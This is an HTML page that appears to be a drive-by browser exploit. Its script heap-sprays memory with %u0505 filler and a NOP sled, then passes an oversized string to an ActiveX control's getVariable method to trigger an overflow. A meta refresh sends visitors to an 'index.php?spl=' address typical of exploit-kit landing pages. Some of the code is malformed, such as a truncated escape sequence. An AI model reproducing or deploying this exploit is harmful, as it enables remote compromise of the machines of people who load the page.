<html>
<body>
  <script>
    var mm = null;

    if( target != null )
    {
      var param1 = unescape("%u0505%u0505");
      var salame = "defaultV";
      var salame2 = 1;
      var salame3 = 0;

      ag  = unescape("%uCCCC%uCCCC");
      sh  =
unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090%");
      sz  = sh.length * 2;
      npsz = 0x400000 - (sz + 0x38);
      nps = unescape("%u0505%u0505");

      while(nps.length * 2 < npsz) nps += nps;
      ihbc = (0x0E000000 - 0x400000) / 0x400000;
      mm  = new Array();

      for(i = 0; i <= ihbc; i++) mm[i] = nps + sh;

      for(var i=0;i<2000;i++)
        param1 = param1 + unescape("%u0505%u0505");
             
      target.getVariable (param1);
    }
  </script>
</body>
<head>
<meta http-equiv="refresh" content="0;URL='http://index.php?spl=/'" />
<object classid='clsid:E23FE9C6-778E-49D4-B537-38FCDE4887D8' id='target' ></object>
</head>
</html>
 
